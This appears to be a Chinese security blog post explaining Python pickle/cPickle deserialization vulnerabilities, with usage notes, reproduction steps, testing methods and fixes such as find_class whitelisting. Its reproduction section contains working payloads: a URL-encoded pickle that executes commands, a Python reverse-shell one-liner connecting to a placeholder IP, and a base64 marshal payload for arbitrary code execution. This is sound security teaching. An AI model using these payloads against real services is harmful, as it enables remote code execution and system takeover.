前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Python安全之反序列化——pickle/cPickle

Python安全之反序列化——pickle/cPickle

作者头像
Jayway
发布2020-06-02 17:02:40
3.6K0
发布2020-06-02 17:02:40
举报
文章被收录于专栏:卓文见识

一. 概述

Python中有两个模块可以实现对象的序列化,pickle和cPickle,区别在于cPickle是用C语言实现的,pickle是用纯python语言实现的,用法类似,cPickle的读写效率高一些。使用时一般先尝试导入cPickle,如果失败,再导入pickle模块。

pickle的应用场景一般有以下几种:

1) 在解析认证token,session的时候;

(尤其web中使用的redis、mongodb、memcached等来存储session等状态信息)

2) 将对象Pickle后存储成磁盘文件;

3)将对象Pickle后在网络中传输。

二.用法

pickle 具有两个重要的函数:

1)一个是dump(), 作用是接受一个文件句柄和一个数据对象作为参数,把数据对象以特定的格式保存到给定的文件中;

2)另一个函数是load(),作用是从文件中取出已保存的对象,pickle 知道如何恢复这些对象到他们本来的格式。

使用方式如下:

代码语言:javascript
复制
pickle.dump(obj, file, protocol=None, *, fix_imports=True)  //输出为文件对象
pickle.dumps(obj, protocol=None, *, fix_imports=True)  //输出为 bytes 对象
pickle.load(file)  // load参数是文件句柄
pickle.loads(file)  // loads参数是字符串

三. 漏洞复现

1、本地命令执行

1) 写一个最简单的demo环境,用户输入文件后使用pickle.load方法进行反序列化:

2) 生成payload,定义执行calc命令的类,使用dumps方法进行序列化并输出到poc.pickle中:

3) 执行此payload:

4) 模拟实现一个更为真实的web环境,取路径中的参数后使用cPickle.loads方法反序列化:

5) 将刚才生成的payload进行url编码,请求:

代码语言:javascript
复制
http://127.0.0.1:8000/?payload=cnt%0Asystem%0Ap1%0A(S%27calc%27%0Ap2%0AtRp3%0A.

2、任意代码执行(任意函数构造)

将上述的calc改为下面的字符串可实现反弹shell:

代码语言:javascript
复制
python-c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

这种通过-c参数只能执行相对简单的代码,如果出现了一些自定义函数,要序列化的对象就成了code类型。

但是pickle不能序列化code对象,这里简单测试一下:将要执行的代码都写到一个函数里foo(),尝试反序列化代码对象:

问题解决:从python2.6起,包含了一个可以序列化code对象的模块Marshal。由于python可以在函数当中再导入模块和定义函数,故可以将自己要执行的代码都写到一个函数foo()里:

得到payload:

代码语言:javascript
复制
http://127.0.0.1:8000/?payload=ctypes%0AFunctionType%0A%28cmarshal%0Aloads%0A%28cbase64%0Ab64decode%0A%28S%27YwAAAAABAAAAAgAAAAMAAABzOwAAAGQBAGQAAGwAAH0AAIcAAGYBAGQCAIYAAIkAAGQDAEeIAABkBACDAQBHSHwAAGoBAGQFAIMBAAFkAABTKAYAAABOaf////9jAQAAAAEAAAAEAAAAEwAAAHMsAAAAfAAAZAEAawEAchAAfAAAU4gAAHwAAGQBABiDAQCIAAB8AABkAgAYgwEAF1MoAwAAAE5pAQAAAGkCAAAAKAAAAAAoAQAAAHQBAAAAbigBAAAAdAMAAABmaWIoAAAAAHMwAAAARDovb3RoZXIvUHl0aG9uX3NlYy9QaWNrbGVSQ0UvcGlja2xlX3BvY19nZW4wLnB5UgEAAAALAAAAcwYAAAAAAQwBBAFzCQAAAGZpYigxMCkgPWkKAAAAdAQAAABjYWxjKAIAAAB0AgAAAG9zdAYAAABzeXN0ZW0oAQAAAFIDAAAAKAAAAAAoAQAAAFIBAAAAczAAAABEOi9vdGhlci9QeXRob25fc2VjL1BpY2tsZVJDRS9waWNrbGVfcG9jX2dlbjAucHl0AwAAAGZvbwkAAABzCAAAAAABDAEPBA8B%27%0AtRtRc__builtin__%0Aglobals%0A%28tRS%27%27%0AtR%28tR.

3、其他payload:

国外文档:

代码语言:javascript
复制
http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf

更多payload:

代码语言:javascript
复制
https://github.com/sensepost/anapickle

四. 测试方法

根据漏洞原理进行测试: 1)查找是否引入pickle/cPickle包;

2)若引入则查看并是否进行了pickle.load(param)或pickle.loads(param)操作;

3) 若参数输入可控,则可能存在反序列化漏洞,构造payload进行利用。

五. 修复方案

1) 确保反序列化对象不可控,且在传递前请进行签名或者加密,防止篡改和重播

2) 如果序列化数据存储在磁盘上,请确保不受信任的第三方不能修改、覆盖或者重新创建自己的序列化数据

3)将 pickle 加载的数据列入白名单,可使用官方推荐的find_class方法,使用白名单限制反序列化引入的对象

代码语言:javascript
复制
https://docs.python.org/3.7/library/pickle.html#pickle-restrict

六、沙盒绕过

代码语言:javascript
复制
http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf
https://github.com/phith0n/code-breaking/tree/master/2018/picklecode
https://github.com/team-su/SUCTF-2019/tree/master/Misc/guess_game
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-05-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 卓文见识 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一. 概述
  • 二.用法
  • 三. 漏洞复现
    • 1、本地命令执行
      • 2、任意代码执行(任意函数构造)
        • 3、其他payload:
        • 四. 测试方法
        • 五. 修复方案
        • 六、沙盒绕过
        相关产品与服务
        文件存储
        文件存储(Cloud File Storage,CFS)为您提供安全可靠、可扩展的共享文件存储服务。文件存储可与腾讯云服务器、容器服务、批量计算等服务搭配使用,为多个计算节点提供容量和性能可弹性扩展的高性能共享存储。腾讯云文件存储的管理界面简单、易使用,可实现对现有应用的无缝集成;按实际用量付费,为您节约成本,简化 IT 运维工作。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档